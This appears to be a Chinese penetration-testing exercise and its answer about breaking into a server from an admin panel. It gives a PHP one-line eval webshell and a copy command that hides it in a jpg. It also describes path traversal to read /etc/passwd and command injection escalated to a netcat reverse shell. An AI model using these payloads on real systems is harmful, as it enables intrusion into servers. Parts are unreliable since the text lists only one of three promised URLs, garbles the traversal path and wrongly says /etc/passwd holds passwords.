小明在你的帮助下,终于进到了后台管理界面,他发现该页面中有一个文件上传功能(只能上传jpg)
还有以下三个url:
www.aaa.com/admin.php?file=1.php
请问小明通过哪些方式可以进入服务器?请至少写出两种方式,并写出详细过程
通过题目已知可以知道存在上传漏洞,于是乎
1.通过上传功能,上传一个带有一句话木马的文件,然后用菜刀连接
通过url可以知道网站是php写的,所以采用PHP的的一句话木马
<?php eval_r($_POST[1]);?>
存储为php.php,在选择一张格式为jpg的图片。通过控制台执行
copy 1.jpg/b + php.php/a php.jpg
存为0.bat文件
在执行0.bat文件,会生成一个名为php.jpg的图片
2.通过第一个url可以发现该网站存在文件包含漏洞
目录遍历
?file=../…/../etc/passwd来获取到服务器密码
?file=../…/../etc/username来获取到服务器的用户名
3.过第二个url可以发现网站存在命令执行漏洞
cmd=ls查看所有文件。可以执行ls那么应该也可以执行nc
通过kali执行nc命令反弹一个shell回来
然后通过nc连接
大致思路只有这些
